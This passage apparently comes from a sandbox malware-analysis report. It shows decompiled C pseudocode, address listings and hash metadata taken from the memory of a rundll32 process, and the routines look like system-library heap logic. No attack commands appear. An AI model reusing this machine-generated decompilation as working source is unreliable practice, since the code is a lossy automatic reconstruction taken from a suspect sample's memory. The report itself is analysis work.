																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04443C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                                                0x0441d5f2
                                                                                                                0x0441d5f5
                                                                                                                0x0441d5f5
                                                                                                                0x0441d5fd
                                                                                                                0x0441d600
                                                                                                                0x0441d60a
                                                                                                                0x0441d60d
                                                                                                                0x0441d617
                                                                                                                0x0441d61d
                                                                                                                0x0441d627
                                                                                                                0x0441d62e
                                                                                                                0x0441d911
                                                                                                                0x0441d913
                                                                                                                0x00000000
                                                                                                                0x0441d919
                                                                                                                0x0441d919
                                                                                                                0x0441d919
                                                                                                                0x0441d634
                                                                                                                0x0441d634
                                                                                                                0x0441d634
                                                                                                                0x0441d634
                                                                                                                0x0441d640
                                                                                                                0x0441d8bf
                                                                                                                0x00000000
                                                                                                                0x0441d646
                                                                                                                0x0441d646
                                                                                                                0x0441d64d
                                                                                                                0x0441d652
                                                                                                                0x0446b2fc
                                                                                                                0x0446b2fc
                                                                                                                0x0446b302
                                                                                                                0x0446b33b
                                                                                                                0x0446b341
                                                                                                                0x00000000
                                                                                                                0x0446b304
                                                                                                                0x0446b304
                                                                                                                0x0446b319
                                                                                                                0x0446b31e
                                                                                                                0x0446b324
                                                                                                                0x0446b326
                                                                                                                0x0446b332
                                                                                                                0x0446b347
                                                                                                                0x0446b34c
                                                                                                                0x0446b351
                                                                                                                0x0446b35a
                                                                                                                0x00000000
                                                                                                                0x0446b328
                                                                                                                0x0446b328
                                                                                                                0x00000000
                                                                                                                0x0446b328
                                                                                                                0x0446b326
                                                                                                                0x0441d658
                                                                                                                0x0441d658
                                                                                                                0x0441d65b
                                                                                                                0x0441d665
                                                                                                                0x00000000
                                                                                                                0x0441d66b
                                                                                                                0x0441d66b
                                                                                                                0x0441d66b
                                                                                                                0x0441d66b
                                                                                                                0x0441d66d
                                                                                                                0x0441d672
                                                                                                                0x0441d67a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441d680
                                                                                                                0x0441d686
                                                                                                                0x0441d8ce
                                                                                                                0x0441d8d4
                                                                                                                0x0441d8da
                                                                                                                0x0441d8dd
                                                                                                                0x0441d8dd
                                                                                                                0x0441d8e0
                                                                                                                0x0441d68c
                                                                                                                0x0441d691
                                                                                                                0x0441d69d
                                                                                                                0x0441d6a2
                                                                                                                0x0441d6a7
                                                                                                                0x0441d6b0
                                                                                                                0x0441d6b0
                                                                                                                0x0441d6b5
                                                                                                                0x0441d6e0
                                                                                                                0x0441d6b7
                                                                                                                0x0441d6b7
                                                                                                                0x0441d6b9
                                                                                                                0x0441d6b9
                                                                                                                0x0441d6bb
                                                                                                                0x0441d6bd
                                                                                                                0x0441d6ce
                                                                                                                0x0441d6d0
                                                                                                                0x0441d6d2
                                                                                                                0x0446b363
                                                                                                                0x0446b365
                                                                                                                0x00000000
                                                                                                                0x0446b36b
                                                                                                                0x00000000
                                                                                                                0x0446b36b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441d6bf
                                                                                                                0x0441d6bf
                                                                                                                0x0441d6e5
                                                                                                                0x0441d6e7
                                                                                                                0x0441d6e9
                                                                                                                0x0441d6e9
                                                                                                                0x0441d6ec
                                                                                                                0x0441d6ec
                                                                                                                0x0441d6ef
                                                                                                                0x0441d6f5
                                                                                                                0x0441d6f9
                                                                                                                0x0441d6fb
                                                                                                                0x0441d6fd
                                                                                                                0x0441d701
                                                                                                                0x0441d703
                                                                                                                0x0441d70a
                                                                                                                0x0441d70a
                                                                                                                0x0441d70a
                                                                                                                0x0441d701
                                                                                                                0x0441d70d
                                                                                                                0x0441d710
                                                                                                                0x0441d710
                                                                                                                0x0441d6c1
                                                                                                                0x0441d6c1
                                                                                                                0x0441d6c1
                                                                                                                0x0441d6c6
                                                                                                                0x0446b36d
                                                                                                                0x0446b36f
                                                                                                                0x00000000
                                                                                                                0x0446b375
                                                                                                                0x0446b375
                                                                                                                0x0446b375
                                                                                                                0x00000000
                                                                                                                0x0446b375
                                                                                                                0x00000000
                                                                                                                0x0441d6cc
                                                                                                                0x0441d6d8
                                                                                                                0x0441d6d8
                                                                                                                0x0441d6d8
                                                                                                                0x00000000
                                                                                                                0x0441d6c6
                                                                                                                0x0441d6bf
                                                                                                                0x00000000
                                                                                                                0x0441d6da
                                                                                                                0x0441d6da
                                                                                                                0x0441d716
                                                                                                                0x0441d71b
                                                                                                                0x0441d720
                                                                                                                0x0441d726
                                                                                                                0x0441d726
                                                                                                                0x0441d72d
                                                                                                                0x00000000
                                                                                                                0x0441d733
                                                                                                                0x0441d739
                                                                                                                0x0441d742
                                                                                                                0x0441d750
                                                                                                                0x0441d758
                                                                                                                0x0441d764
                                                                                                                0x0441d776
                                                                                                                0x0441d77a
                                                                                                                0x0441d783
                                                                                                                0x0441d928
                                                                                                                0x0441d92c
                                                                                                                0x0441d93d
                                                                                                                0x0441d944
                                                                                                                0x0441d94f
                                                                                                                0x0441d954
                                                                                                                0x0441d956
                                                                                                                0x0441d95f
                                                                                                                0x0441d961
                                                                                                                0x0441d973
                                                                                                                0x0441d973
                                                                                                                0x0441d956
                                                                                                                0x0441d944
                                                                                                                0x0441d92c
                                                                                                                0x0441d78b
                                                                                                                0x0446b394
                                                                                                                0x0441d791
                                                                                                                0x0441d798
                                                                                                                0x0446b3a3
                                                                                                                0x0446b3bb
                                                                                                                0x0446b3bb
                                                                                                                0x0441d7a5
                                                                                                                0x0441d866
                                                                                                                0x0441d870
                                                                                                                0x0441d884
                                                                                                                0x0441d892
                                                                                                                0x0441d898
                                                                                                                0x0441d89e
                                                                                                                0x0441d8a0
                                                                                                                0x0441d8a6
                                                                                                                0x0441d8ac
                                                                                                                0x0441d8ae
                                                                                                                0x0441d8b4
                                                                                                                0x0441d8b4
                                                                                                                0x0441d8ae
                                                                                                                0x0441d7a5
                                                                                                                0x0441d78b
                                                                                                                0x0441d7b1
                                                                                                                0x0446b3c5
                                                                                                                0x0446b3c5
                                                                                                                0x0441d7c3
                                                                                                                0x0441d7ca
                                                                                                                0x0441d7e5
                                                                                                                0x0441d7eb
                                                                                                                0x0441d8eb
                                                                                                                0x0441d8ed
                                                                                                                0x00000000
                                                                                                                0x0441d8f3
                                                                                                                0x0441d8f3
                                                                                                                0x0441d8f3
                                                                                                                0x00000000
                                                                                                                0x0441d8ed
                                                                                                                0x0441d7cc
                                                                                                                0x0441d7cc
                                                                                                                0x0441d7d2
                                                                                                                0x00000000
                                                                                                                0x0441d7d4
                                                                                                                0x0441d7d4
                                                                                                                0x0441d7d7
                                                                                                                0x0441d7df
                                                                                                                0x0446b3d4
                                                                                                                0x0446b3d9
                                                                                                                0x0446b3dc
                                                                                                                0x0446b3dc
                                                                                                                0x0446b3df
                                                                                                                0x0446b3e2
                                                                                                                0x0446b468
                                                                                                                0x0446b46d
                                                                                                                0x0446b46f
                                                                                                                0x0446b46f
                                                                                                                0x0446b475
                                                                                                                0x0441d8f8
                                                                                                                0x0441d8f9
                                                                                                                0x0441d8fd
                                                                                                                0x0446b3e8
                                                                                                                0x0446b3e8
                                                                                                                0x0446b3eb
                                                                                                                0x0446b3ed
                                                                                                                0x00000000
                                                                                                                0x0446b3ef
                                                                                                                0x0446b3ef
                                                                                                                0x0446b3f1
                                                                                                                0x0446b3f4
                                                                                                                0x0446b3fe
                                                                                                                0x0446b404
                                                                                                                0x0446b409
                                                                                                                0x0446b40e
                                                                                                                0x0446b410
                                                                                                                0x0446b410
                                                                                                                0x0446b414
                                                                                                                0x0446b414
                                                                                                                0x0446b41b
                                                                                                                0x0446b420
                                                                                                                0x0446b423
                                                                                                                0x0446b425
                                                                                                                0x0446b427
                                                                                                                0x0446b42a
                                                                                                                0x0446b42d
                                                                                                                0x0446b42d
                                                                                                                0x0446b42a
                                                                                                                0x0446b432
                                                                                                                0x0446b436
                                                                                                                0x0446b438
                                                                                                                0x0446b43b
                                                                                                                0x0446b43b
                                                                                                                0x0446b449
                                                                                                                0x0446b44e
                                                                                                                0x0446b454
                                                                                                                0x0446b458
                                                                                                                0x0446b458
                                                                                                                0x0446b45d
                                                                                                                0x00000000
                                                                                                                0x0446b45d
                                                                                                                0x0446b3ed
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441d7df
                                                                                                                0x0441d7d2
                                                                                                                0x0441d7ca
                                                                                                                0x0446b37c
                                                                                                                0x0446b37e
                                                                                                                0x0446b385
                                                                                                                0x0446b38a
                                                                                                                0x00000000
                                                                                                                0x0446b38a
                                                                                                                0x0441d742
                                                                                                                0x0441d7f1
                                                                                                                0x0441d7f8
                                                                                                                0x0446b49b
                                                                                                                0x0446b49b
                                                                                                                0x0441d800
                                                                                                                0x0441d837
                                                                                                                0x0441d843
                                                                                                                0x0441d845
                                                                                                                0x0441d847
                                                                                                                0x0441d84a
                                                                                                                0x0441d84b
                                                                                                                0x0441d84e
                                                                                                                0x0441d857
                                                                                                                0x0441d802
                                                                                                                0x0441d802
                                                                                                                0x0441d80d
                                                                                                                0x00000000
                                                                                                                0x0441d818
                                                                                                                0x0441d818
                                                                                                                0x0441d824
                                                                                                                0x0441d831
                                                                                                                0x0446b4a5
                                                                                                                0x0446b4ab
                                                                                                                0x0446b4b3
                                                                                                                0x0446b4b8
                                                                                                                0x0446b4bb
                                                                                                                0x00000000
                                                                                                                0x0446b4c1
                                                                                                                0x0446b4c1
                                                                                                                0x0446b4c8
                                                                                                                0x00000000
                                                                                                                0x0446b4ce
                                                                                                                0x0446b4d4
                                                                                                                0x0446b4e1
                                                                                                                0x0446b4e3
                                                                                                                0x0446b4e5
                                                                                                                0x00000000
                                                                                                                0x0446b4eb
                                                                                                                0x0446b4f0
                                                                                                                0x0446b4f2
                                                                                                                0x0441dac9
                                                                                                                0x0441dacc
                                                                                                                0x0441dacf
                                                                                                                0x0441dad1
                                                                                                                0x0441dd78
                                                                                                                0x0441dd78
                                                                                                                0x0441dcf2
                                                                                                                0x00000000
                                                                                                                0x0441dad7
                                                                                                                0x0441dad9
                                                                                                                0x0441dadb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441dae1
                                                                                                                0x0441dae1
                                                                                                                0x0441dae4
                                                                                                                0x0441dae6
                                                                                                                0x0446b4f9
                                                                                                                0x0446b4f9
                                                                                                                0x0446b500
                                                                                                                0x0441daec
                                                                                                                0x0441daec
                                                                                                                0x0441daf5
                                                                                                                0x0441daf8
                                                                                                                0x0441dafb
                                                                                                                0x0441db03
                                                                                                                0x0441db11
                                                                                                                0x0441db16
                                                                                                                0x0441db19
                                                                                                                0x0441db1b
                                                                                                                0x0446b52c
                                                                                                                0x0446b531
                                                                                                                0x0446b534
                                                                                                                0x0441db21
                                                                                                                0x0441db21
                                                                                                                0x0441db24
                                                                                                                0x0441dcd9
                                                                                                                0x0441dce2
                                                                                                                0x0441dce5
                                                                                                                0x0441dd6a
                                                                                                                0x0441dd6d
                                                                                                                0x00000000
                                                                                                                0x0441dd73
                                                                                                                0x0446b51a
                                                                                                                0x0446b51c
                                                                                                                0x0446b51f
                                                                                                                0x0446b524
                                                                                                                0x00000000
                                                                                                                0x0446b524
                                                                                                                0x0441dce7
                                                                                                                0x0441dce7
                                                                                                                0x0441dce7
                                                                                                                0x00000000
                                                                                                                0x0441dce7
                                                                                                                0x00000000
                                                                                                                0x0441db2a
                                                                                                                0x0441db2c
                                                                                                                0x0441db31
                                                                                                                0x0441db33
                                                                                                                0x0441db36
                                                                                                                0x0441db39
                                                                                                                0x0441db3b
                                                                                                                0x0441db66
                                                                                                                0x0441db66
                                                                                                                0x0441db3d
                                                                                                                0x0441db3d
                                                                                                                0x0441db3e
                                                                                                                0x0441db46
                                                                                                                0x0441db47
                                                                                                                0x0441db49
                                                                                                                0x0441db4c
                                                                                                                0x0441db53
                                                                                                                0x0441db55
                                                                                                                0x0441db58
                                                                                                                0x0441db5a
                                                                                                                0x0446b50a
                                                                                                                0x0446b50f
                                                                                                                0x0446b512
                                                                                                                0x0441db60
                                                                                                                0x0441db60
                                                                                                                0x0441db63
                                                                                                                0x0441db63
                                                                                                                0x00000000
                                                                                                                0x0441db63
                                                                                                                0x0441db5a
                                                                                                                0x0441db3b
                                                                                                                0x0441db24
                                                                                                                0x0441db69
                                                                                                                0x0441db69
                                                                                                                0x0441db6c
                                                                                                                0x0441db6f
                                                                                                                0x0441db74
                                                                                                                0x0446b557
                                                                                                                0x0446b557
                                                                                                                0x0446b55e
                                                                                                                0x0441db7a
                                                                                                                0x0441db7c
                                                                                                                0x0441db7f
                                                                                                                0x0441db82
                                                                                                                0x0441db85
                                                                                                                0x00000000
                                                                                                                0x0441db8b
                                                                                                                0x0441db8b
                                                                                                                0x0441db8d
                                                                                                                0x0441db9b
                                                                                                                0x0441db9b
                                                                                                                0x0441db9d
                                                                                                                0x0441dba0
                                                                                                                0x0441dba2
                                                                                                                0x0441dba4
                                                                                                                0x0441dba7
                                                                                                                0x0441dba9
                                                                                                                0x0441dbae
                                                                                                                0x0441dbae
                                                                                                                0x0441dbb1
                                                                                                                0x0441dbb4
                                                                                                                0x0441dbb4
                                                                                                                0x0441dbb7
                                                                                                                0x0441dbba
                                                                                                                0x0441dcd2
                                                                                                                0x0441dcd4
                                                                                                                0x00000000
                                                                                                                0x0441dbc0
                                                                                                                0x0441dbc0
                                                                                                                0x0441dbd2
                                                                                                                0x0441dbd7
                                                                                                                0x0441dbda
                                                                                                                0x0441dbdd
                                                                                                                0x0441dbdf
                                                                                                                0x00000000
                                                                                                                0x0441dbe5
                                                                                                                0x0441dbe5
                                                                                                                0x0441dbee
                                                                                                                0x0441dbf1
                                                                                                                0x0446b541
                                                                                                                0x0446b544
                                                                                                                0x00000000
                                                                                                                0x0446b546
                                                                                                                0x0446b546
                                                                                                                0x00000000
                                                                                                                0x0446b546
                                                                                                                0x0441dbf7
                                                                                                                0x0441dbf7
                                                                                                                0x0441dbfd
                                                                                                                0x0441dbfd
                                                                                                                0x0441dbff
                                                                                                                0x0441dc0b
                                                                                                                0x0441dc15
                                                                                                                0x0441dc1b
                                                                                                                0x0441dc1d
                                                                                                                0x0441dc21
                                                                                                                0x0441dc21
                                                                                                                0x0441dc23
                                                                                                                0x0441dc23
                                                                                                                0x0441dc26
                                                                                                                0x0441dc29
                                                                                                                0x0441dc2b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441dc31
                                                                                                                0x0441dc34
                                                                                                                0x0441dc36
                                                                                                                0x0441dcbf
                                                                                                                0x0441dcbf
                                                                                                                0x0441dcc2
                                                                                                                0x00000000
                                                                                                                0x0441dc3c
                                                                                                                0x0441dc41
                                                                                                                0x0441dc43
                                                                                                                0x00000000
                                                                                                                0x0441dc45
                                                                                                                0x0441dc45
                                                                                                                0x0441dc47
                                                                                                                0x00000000
                                                                                                                0x0441dc4d
                                                                                                                0x0441dc4d
                                                                                                                0x0441dc50
                                                                                                                0x0441dc52
                                                                                                                0x0441dc55
                                                                                                                0x0441dcfa
                                                                                                                0x0441dcfe
                                                                                                                0x0441dd08
                                                                                                                0x0441dd0a
                                                                                                                0x0441dd0c
                                                                                                                0x00000000
                                                                                                                0x0441dd12
                                                                                                                0x0441dd15
                                                                                                                0x0441dd2d
                                                                                                                0x0441dd2f
                                                                                                                0x0441dd32
                                                                                                                0x0441dd35
                                                                                                                0x00000000
                                                                                                                0x0441dd35
                                                                                                                0x0441dc5b
                                                                                                                0x0441dc5b
                                                                                                                0x0441dc5e
                                                                                                                0x0441dc61
                                                                                                                0x0441dc64
                                                                                                                0x0441dc67
                                                                                                                0x0441dc67
                                                                                                                0x0441dc6a
                                                                                                                0x0441dc6c
                                                                                                                0x0441dc8e
                                                                                                                0x0441dc8e
                                                                                                                0x0441dc91
                                                                                                                0x0441dc93
                                                                                                                0x0441dcce
                                                                                                                0x0441dcce
                                                                                                                0x0441dc95
                                                                                                                0x0441dc9c
                                                                                                                0x0441dc6e
                                                                                                                0x0441dc72
                                                                                                                0x0441dc75
                                                                                                                0x0441dc77
                                                                                                                0x0441dc79
                                                                                                                0x0446b551
                                                                                                                0x0446b551
                                                                                                                0x00000000
                                                                                                                0x0441dc7f
                                                                                                                0x0441dc7f
                                                                                                                0x0441dc81
                                                                                                                0x00000000
                                                                                                                0x0441dc83
                                                                                                                0x0441dc86
                                                                                                                0x0441dc88
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441dc88
                                                                                                                0x0441dc81
                                                                                                                0x0441dc79
                                                                                                                0x0441dc6c
                                                                                                                0x0441dc55
                                                                                                                0x0441dc47
                                                                                                                0x0441dc43
                                                                                                                0x00000000
                                                                                                                0x0441dc36
                                                                                                                0x0441dc23
                                                                                                                0x00000000
                                                                                                                0x0441dbff
                                                                                                                0x0441dbf1
                                                                                                                0x0441dbdf
                                                                                                                0x0441db8f
                                                                                                                0x0441db92
                                                                                                                0x0441db95
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441db95
                                                                                                                0x0441db8d
                                                                                                                0x0441db85
                                                                                                                0x0441db74
                                                                                                                0x0441dc9f
                                                                                                                0x0441dca2
                                                                                                                0x0441dcb0
                                                                                                                0x0441dcb0
                                                                                                                0x0441dad1
                                                                                                                0x0446b4e5
                                                                                                                0x0446b4c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0441d831
                                                                                                                0x0441d80d
                                                                                                                0x00000000
                                                                                                                0x0441d800
                                                                                                                0x0446b47f
                                                                                                                0x0446b485
                                                                                                                0x00000000
                                                                                                                0x0446b485
                                                                                                                0x0441d665
                                                                                                                0x0441d652
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: X\5$)5
                                                                                                                • API String ID: 0-2072700117
                                                                                                                • Opcode ID: 204124c06d5f650e940c204727c2471aadec9d5ba845e4a84aba39b04ce1ac32
                                                                                                                • Instruction ID: 4c2cddb300283cf336efc1f79c3e68a649fe14384aa150844010543f9fb258a9
                                                                                                                • Opcode Fuzzy Hash: 204124c06d5f650e940c204727c2471aadec9d5ba845e4a84aba39b04ce1ac32
                                                                                                                • Instruction Fuzzy Hash: 99E1AFB0B006658FEF34DF19C944B6AB7B1EF45308F0501ABD9199B3A1EB74B981CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044CE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E044CE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E044CBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E044CBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E044CAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04449730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E044CA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E044CA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04449730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E044CA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E044CA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04422280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0441B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0441FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04427D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E044BFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                0x044ce547
                                                                                                                0x044ce549
                                                                                                                0x044ce54f
                                                                                                                0x044ce553
                                                                                                                0x044ce557
                                                                                                                0x044ce55a
                                                                                                                0x044ce55c
                                                                                                                0x044ce55f
                                                                                                                0x044ce561
                                                                                                                0x044ce567
                                                                                                                0x044ce56b
                                                                                                                0x044ce7e2
                                                                                                                0x00000000
                                                                                                                0x044ce571
                                                                                                                0x044ce575
                                                                                                                0x044ce577
                                                                                                                0x044ce57b
                                                                                                                0x044ce57c
                                                                                                                0x044ce57d
                                                                                                                0x044ce57e
                                                                                                                0x044ce57f
                                                                                                                0x044ce588
                                                                                                                0x044ce58f
                                                                                                                0x044ce591
                                                                                                                0x044ce592
                                                                                                                0x044ce592
                                                                                                                0x044ce596
                                                                                                                0x044ce59e
                                                                                                                0x044ce5a0
                                                                                                                0x044ce5a6
                                                                                                                0x044ce61d
                                                                                                                0x044ce61d
                                                                                                                0x044ce621
                                                                                                                0x044ce623
                                                                                                                0x044ce630
                                                                                                                0x044ce630
                                                                                                                0x044ce7e6
                                                                                                                0x044ce7eb
                                                                                                                0x044ce7ed
                                                                                                                0x044ce7f4
                                                                                                                0x044ce7fa
                                                                                                                0x044ce7ff
                                                                                                                0x044ce7ff
                                                                                                                0x044ce80a
                                                                                                                0x044ce812
                                                                                                                0x044ce812
                                                                                                                0x044ce5ab
                                                                                                                0x044ce5b4
                                                                                                                0x044ce5b9
                                                                                                                0x044ce5be
                                                                                                                0x044ce5c0
                                                                                                                0x044ce5c2
                                                                                                                0x044ce5c8
                                                                                                                0x044ce5c9
                                                                                                                0x044ce5cb
                                                                                                                0x044ce5cc
                                                                                                                0x044ce5d5
                                                                                                                0x044ce5e4
                                                                                                                0x044ce5f1
                                                                                                                0x044ce5f8
                                                                                                                0x044ce5f8
                                                                                                                0x044ce5d5
                                                                                                                0x044ce602
                                                                                                                0x044ce616
                                                                                                                0x044ce63d
                                                                                                                0x044ce644
                                                                                                                0x044ce64d
                                                                                                                0x044ce652
                                                                                                                0x044ce657
                                                                                                                0x044ce659
                                                                                                                0x044ce65b
                                                                                                                0x044ce661
                                                                                                                0x044ce662
                                                                                                                0x044ce664
                                                                                                                0x044ce665
                                                                                                                0x044ce66e
                                                                                                                0x044ce67d
                                                                                                                0x044ce68a
                                                                                                                0x044ce691
                                                                                                                0x044ce691
                                                                                                                0x044ce66e
                                                                                                                0x044ce6b0
                                                                                                                0x00000000
                                                                                                                0x044ce6b6
                                                                                                                0x044ce6bd
                                                                                                                0x044ce6c7
                                                                                                                0x044ce6d7
                                                                                                                0x044ce6d9
                                                                                                                0x044ce6db
                                                                                                                0x044ce6de
                                                                                                                0x044ce6e3
                                                                                                                0x044ce6f3
                                                                                                                0x044ce6fc
                                                                                                                0x044ce700
                                                                                                                0x044ce700
                                                                                                                0x044ce704
                                                                                                                0x044ce70a
                                                                                                                0x044ce70a
                                                                                                                0x044ce713
                                                                                                                0x044ce716
                                                                                                                0x044ce719
                                                                                                                0x044ce720
                                                                                                                0x044ce761
                                                                                                                0x044ce76b
                                                                                                                0x044ce774
                                                                                                                0x044ce77a
                                                                                                                0x044ce77a
                                                                                                                0x044ce78a
                                                                                                                0x044ce791
                                                                                                                0x044ce799
                                                                                                                0x044ce79b
                                                                                                                0x044ce79f
                                                                                                                0x044ce7aa
                                                                                                                0x044ce7c0
                                                                                                                0x044ce7ac
                                                                                                                0x044ce7b2
                                                                                                                0x044ce7b9
                                                                                                                0x044ce7b9
                                                                                                                0x044ce7c7
                                                                                                                0x044ce806
                                                                                                                0x00000000
                                                                                                                0x044ce7c9
                                                                                                                0x044ce7d1
                                                                                                                0x044ce7d8
                                                                                                                0x00000000
                                                                                                                0x044ce7d8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044ce722
